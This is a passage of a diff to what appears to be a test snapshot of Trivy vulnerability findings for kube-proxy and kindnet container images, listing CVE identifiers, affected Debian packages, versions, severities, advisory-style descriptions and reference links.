"scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ @@ -76375,697 +78299,771 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.36.1-8+deb11u1", - "packageName": "bsdutils", + "fixedVersion": "1.0.6-9.2~deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3112-1", + "installedVersion": "1.0.6-9.2~deb10u1", + "packageName": "libbz2-1.0", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "bzip2 - bugfix update", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33574", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/security/cve/CVE-2021-33574", + "https://linux.oracle.com/cve/CVE-2021-33574.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210629-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "https://www.cve.org/CVERecord?id=CVE-2021-33574", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "glibc: mq_notify does not handle separately allocated thread attributes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2021-33574", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://access.redhat.com/security/cve/CVE-2021-33574", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202107-07", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-35942", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "https://access.redhat.com/security/cve/CVE-2021-35942", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "https://linux.oracle.com/cve/CVE-2021-35942.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "https://security.gentoo.org/glsa/202208-24", + "https://security.netapp.com/advisory/ntap-20210827-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-35942", ], }, "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "name": "glibc: Arbitrary read in wordexp()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://avd.aquasec.com/nvd/cve-2021-35942", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://access.redhat.com/security/cve/CVE-2021-35942", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", - "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", - ], - }, - "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://ubuntu.com/security/notices/USN-5699-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.20.10", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1664", - "installedVersion": "1.20.9", - "packageName": "dpkg", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23218", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", - "https://lists.debian.org/debian-security-announce/2022/msg00115.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", - "https://security.netapp.com/advisory/ntap-20221007-0002/", - "https://ubuntu.com/security/notices/USN-5446-1", - "https://ubuntu.com/security/notices/USN-5446-2", + "https://access.redhat.com/security/cve/CVE-2022-23218", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "https://linux.oracle.com/cve/CVE-2022-23218.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", + "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1664", + "value": "https://avd.aquasec.com/nvd/cve-2022-23218", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "value": "https://access.redhat.com/security/cve/CVE-2022-23218", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", }, { "type": "URL", - "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-1", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.2.27-2+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-34903", - "installedVersion": "2.2.27-2+deb11u1", - "packageName": "gpgv", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23219", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "http://www.openwall.com/lists/oss-security/2022/07/02/1", - "https://access.redhat.com/errata/RHSA-2022:6602", - "https://access.redhat.com/security/cve/CVE-2022-34903", - "https://bugs.debian.org/1014157", - "https://bugzilla.redhat.com/2102868", - "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", - "https://dev.gnupg.org/T6027", - "https://errata.almalinux.org/9/ALSA-2022-6602.html", - "https://errata.rockylinux.org/RLSA-2022:6602", - "https://linux.oracle.com/cve/CVE-2022-34903.html", - "https://linux.oracle.com/errata/ELSA-2022-6602.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", - "https://security.netapp.com/advisory/ntap-20220826-0005/", - "https://ubuntu.com/security/notices/USN-5503-1", - "https://ubuntu.com/security/notices/USN-5503-2", - "https://www.cve.org/CVERecord?id=CVE-2022-34903", - "https://www.debian.org/security/2022/dsa-5174", - "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "https://access.redhat.com/security/cve/CVE-2022-23219", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "https://linux.oracle.com/cve/CVE-2022-23219.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Signature spoofing via status line injection", + "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-34903", + "value": "https://avd.aquasec.com/nvd/cve-2022-23219", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "value": "https://access.redhat.com/security/cve/CVE-2022-23219", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6602", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-34903", + "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", }, { "type": "URL", - "value": "https://bugs.debian.org/1014157", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2102868", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://dev.gnupg.org/T6027", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6602", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1751", + "installedVersion": "2.28-10", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-1751", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "https://linux.oracle.com/cve/CVE-2020-1751.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200430-0002/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1751", + ], + }, + "category": "Vulnerability", + "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: array overflow in backtrace functions for powerpc", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "value": "https://avd.aquasec.com/nvd/cve-2020-1751", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "value": "https://access.redhat.com/security/cve/CVE-2020-1751", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-2", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5174", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "value": "https://ubuntu.com/security/notices/USN-4416-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4416-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3219", - "installedVersion": "2.2.27-2+deb11u1", - "packageName": "gpgv", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1752", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-3219", - "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", - "https://dev.gnupg.org/D556", - "https://dev.gnupg.org/T5993", - "https://marc.info/?l=oss-security&m=165696590211434&w=4", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", - "https://security.netapp.com/advisory/ntap-20230324-0001/", - "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "https://access.redhat.com/security/cve/CVE-2020-1752", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "https://linux.oracle.com/cve/CVE-2020-1752.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "https://security.gentoo.org/glsa/202101-20", + "https://security.netapp.com/advisory/ntap-20200511-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1752", ], }, "category": "Vulnerability", - "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "denial of service issue (resource consumption) using compressed packets", + "name": "glibc: use-after-free in glob() function when expanding ~user", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3219", + "value": "https://avd.aquasec.com/nvd/cve-2020-1752", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3219", + "value": "https://access.redhat.com/security/cve/CVE-2020-1752", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", }, { "type": "URL", - "value": "https://dev.gnupg.org/D556", + "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5993", + "value": 